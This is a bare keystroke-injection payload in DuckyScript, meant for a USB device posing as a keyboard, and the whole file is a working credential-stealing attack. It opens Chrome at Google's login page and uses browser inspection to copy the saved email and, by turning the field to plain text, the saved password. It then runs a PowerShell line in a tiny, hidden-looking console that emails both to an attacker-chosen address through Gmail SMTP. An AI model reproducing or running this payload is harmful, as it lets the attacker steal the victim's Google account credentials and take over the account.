DELAY 500
GUI
DELAY 500
STRING chrome
DELAY 500
ENTER
DELAY 1000
STRINGLN accounts.google.com/Login
DELAY 3000
SHIFT F10
DELAY 500
UP
DELAY 100
ENTER
REM Steal Email
UP
UP
UP
F2
DELAY 200
CTRL A
CTRL C
DELAY 100
GUI
DELAY 500
ENTER
DELAY 1000
STRINGLN mode con: cols=16 lines=1&color FE
DELAY 100
STRING powershell "$u='"
DELAY 100
CTRL V
STRING ';
DELAY 100
ALT TAB
REM Steal Password
DELAY 100
DOWN
DOWN
DOWN
ENTER
TAB
TAB
STRINGLN text
DELAY 200
CTRL C
CTRL V
DELAY 100
ALT F4
DELAY 100
STRING $p ='
CTRL V
STRING ';
REM Email Username and Password
DELAY 100
STRING $m='Username: '+$u+' Password: '+$p;
DELAY 100
STRING $ser='smtp.gmail.com';
STRING $msg=New-Object Net.Mail.MailMessage;
STRING $smtp=New-Object Net.Mail.SmtpClient($ser);
STRING $smtp.EnableSsl=$True;
STRING $smtp.Credentials=New-Object System.Net.NetworkCredential('<email>','<password>');
STRING $msg.From='<email_from>';$msg.To.Add('<email_to>');$msg.Subject='Pass';
STRING $msg.Body=$m;$smtp.Send($msg);
STRINGLN "&exit
ALT F4
